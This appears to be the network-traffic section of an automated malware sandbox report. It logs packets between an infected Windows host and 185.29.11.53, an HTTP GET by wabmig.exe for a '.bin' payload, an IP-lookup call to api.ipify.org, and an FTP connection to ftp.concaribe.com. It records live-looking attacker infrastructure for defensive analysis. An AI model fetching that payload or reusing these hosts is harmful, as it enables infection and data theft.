                                      Sep 25, 2024 12:09:07.692779064 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.692797899 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.692811966 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.692918062 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.692934990 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.692950010 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.692955017 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.692966938 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.692974091 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.692992926 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.693023920 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.693537951 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.693552971 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.693567038 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.693576097 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.693589926 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.693603992 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.766168118 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.766191006 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.766216993 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.766226053 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.766232967 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.766252041 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.766266108 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.766266108 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.766268015 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.766277075 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.766287088 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.766297102 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.766314983 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.766326904 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.767013073 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.767025948 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.767050982 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.767061949 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.772326946 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.772341967 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.772380114 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.772397041 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.772430897 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.772454023 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.772469044 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.772473097 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.772485018 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.772490978 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.772502899 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.772506952 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.772526026 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.772540092 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.773322105 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.773336887 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.773351908 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.773369074 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.773386002 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.773691893 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.773706913 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.773729086 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.773736000 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.773745060 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.773751974 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.773762941 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.773773909 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.773798943 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.774561882 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.774610043 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.778964996 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.779021025 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.779062033 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.779078007 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.779092073 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.779104948 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.779117107 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.779123068 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.779133081 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.779150963 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.779151917 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.779175043 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.779190063 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.779637098 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.779660940 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.779676914 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.779680014 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.779692888 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.779696941 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.779710054 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.779715061 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.779726982 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.779731989 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.779747009 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.779761076 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.780572891 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.780590057 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.780603886 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.780617952 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.780618906 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.780636072 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.780637980 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.780659914 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.780683041 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.846869946 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.846960068 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.846976995 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.846992016 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.847007990 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.847022057 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.847038031 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.847091913 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.847170115 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.847304106 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.853091002 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.853204966 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.853219032 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.853234053 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.853247881 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.853264093 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.853277922 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.853339911 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.853409052 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.853540897 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.853564024 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.853579998 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.853593111 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.853607893 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.853626013 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.853671074 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.860209942 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.860227108 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.860253096 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.860270023 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.860292912 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.860306025 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.860323906 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.860331059 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.860388041 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.860599995 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.860615969 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.860630035 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.860673904 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.860682011 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.860688925 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.860703945 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.860718966 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.860748053 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.860797882 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.861444950 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.861476898 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.861491919 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.861526012 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.861541986 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.861552000 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.861610889 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.866861105 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.866877079 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.866889954 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.866914034 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.866936922 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.866951942 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.866966963 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.866972923 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.866983891 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.867027998 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.867088079 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.867285967 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.867338896 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.867353916 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.867405891 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.867419004 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.867420912 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.867436886 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.867453098 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.867469072 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.867508888 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.867557049 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.868268967 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.868283987 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.868299961 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.868329048 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.868350983 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.868355989 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.868366957 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.868381977 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.868397951 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.868441105 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.868494987 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.869164944 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.869221926 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.869240046 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.869291067 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.869299889 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.869306087 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.869321108 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.869335890 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.869350910 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.869384050 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.869434118 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.870101929 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.870116949 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.870182037 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.933084011 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.933115959 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.933130980 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.933146000 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.933161974 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.933175087 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.933188915 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.933202982 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.933211088 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.933218002 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.933233023 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.933249950 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.933263063 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.933269024 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.933276892 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.933294058 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.933336020 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.933672905 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.933686972 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.933839083 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.939546108 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.939605951 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.939620972 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.939635992 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.939656973 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.939687967 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.939712048 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.939727068 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.939750910 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.939768076 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.939783096 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.939810991 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.939826012 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.939848900 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.939850092 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.939863920 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.939865112 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.939881086 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.939882040 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.939897060 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.939901114 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.939913988 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.939920902 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.939930916 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.939937115 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.939948082 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.939949989 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.939971924 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.939987898 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.940690041 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.940704107 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.940720081 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.940732002 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.940751076 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.940754890 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.940769911 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.940783024 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.940788984 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.940807104 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.940815926 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.940824032 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.940843105 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.940846920 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.940864086 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.940869093 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.940879107 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.940886974 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.940903902 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.940922976 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.946329117 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.946352959 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.946367979 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.946388960 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.946403027 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.946417093 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.946439981 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.946440935 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.946455956 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.946470976 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.946485043 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.946500063 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.946516037 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.946554899 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.946624994 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.946779013 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.946800947 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.946815014 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.946830034 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.946844101 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.946851015 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.946954012 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:08.361170053 CEST49738443192.168.2.4104.26.13.205
                                      Sep 25, 2024 12:09:08.361244917 CEST44349738104.26.13.205192.168.2.4
                                      Sep 25, 2024 12:09:08.361495018 CEST49738443192.168.2.4104.26.13.205
                                      Sep 25, 2024 12:09:08.393265963 CEST49738443192.168.2.4104.26.13.205
                                      Sep 25, 2024 12:09:08.393292904 CEST44349738104.26.13.205192.168.2.4
                                      Sep 25, 2024 12:09:08.854000092 CEST44349738104.26.13.205192.168.2.4
                                      Sep 25, 2024 12:09:08.854111910 CEST49738443192.168.2.4104.26.13.205
                                      Sep 25, 2024 12:09:08.866796017 CEST49738443192.168.2.4104.26.13.205
                                      Sep 25, 2024 12:09:08.866838932 CEST44349738104.26.13.205192.168.2.4
                                      Sep 25, 2024 12:09:08.867244959 CEST44349738104.26.13.205192.168.2.4
                                      Sep 25, 2024 12:09:08.919559956 CEST49738443192.168.2.4104.26.13.205
                                      Sep 25, 2024 12:09:09.128837109 CEST49738443192.168.2.4104.26.13.205
                                      Sep 25, 2024 12:09:09.171418905 CEST44349738104.26.13.205192.168.2.4
                                      Sep 25, 2024 12:09:09.239191055 CEST44349738104.26.13.205192.168.2.4
                                      Sep 25, 2024 12:09:09.239259958 CEST44349738104.26.13.205192.168.2.4
                                      Sep 25, 2024 12:09:09.239317894 CEST49738443192.168.2.4104.26.13.205
                                      Sep 25, 2024 12:09:09.266324997 CEST49738443192.168.2.4104.26.13.205
                                      Sep 25, 2024 12:09:10.711536884 CEST4973921192.168.2.4192.185.13.234
                                      Sep 25, 2024 12:09:10.718565941 CEST2149739192.185.13.234192.168.2.4
                                      Sep 25, 2024 12:09:10.718645096 CEST4973921192.168.2.4192.185.13.234
                                      Sep 25, 2024 12:09:10.720813990 CEST4973921192.168.2.4192.185.13.234
                                      Sep 25, 2024 12:09:10.725734949 CEST2149739192.185.13.234192.168.2.4
                                      Sep 25, 2024 12:09:10.725806952 CEST4973921192.168.2.4192.185.13.234
                                      TimestampSource PortDest PortSource IPDest IP
                                      Sep 25, 2024 12:09:08.330909014 CEST5986453192.168.2.41.1.1.1
                                      Sep 25, 2024 12:09:08.338037968 CEST53598641.1.1.1192.168.2.4
                                      Sep 25, 2024 12:09:10.394656897 CEST5984653192.168.2.41.1.1.1
                                      Sep 25, 2024 12:09:10.710258007 CEST53598461.1.1.1192.168.2.4
                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Sep 25, 2024 12:09:08.330909014 CEST192.168.2.41.1.1.10xefb3Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                      Sep 25, 2024 12:09:10.394656897 CEST192.168.2.41.1.1.10xc7d6Standard query (0)ftp.concaribe.comA (IP address)IN (0x0001)false
                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Sep 25, 2024 12:09:08.338037968 CEST1.1.1.1192.168.2.40xefb3No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                      Sep 25, 2024 12:09:08.338037968 CEST1.1.1.1192.168.2.40xefb3No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                      Sep 25, 2024 12:09:08.338037968 CEST1.1.1.1192.168.2.40xefb3No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                      Sep 25, 2024 12:09:10.710258007 CEST1.1.1.1192.168.2.40xc7d6No error (0)ftp.concaribe.comconcaribe.comCNAME (Canonical name)IN (0x0001)false
                                      Sep 25, 2024 12:09:10.710258007 CEST1.1.1.1192.168.2.40xc7d6No error (0)concaribe.com192.185.13.234A (IP address)IN (0x0001)false
                                      • api.ipify.org
                                      • 185.29.11.53
                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.449737185.29.11.53806824C:\Program Files (x86)\Windows Mail\wabmig.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 25, 2024 12:09:06.924766064 CEST177OUTGET /bIGuEflfnZjESw74.bin HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Host: 185.29.11.53
                                      Cache-Control: no-cache
                                      Sep 25, 2024 12:09:07.525511980 CEST1236INHTTP/1.1 200 OK
                                      Content-Type: application/octet-stream
                                      Last-Modified: Wed, 25 Sep 2024 08:57:18 GMT
                                      Accept-Ranges: bytes
                                      ETag: "255312ed28fdb1:0"
                                      Server: Microsoft-IIS/8.5
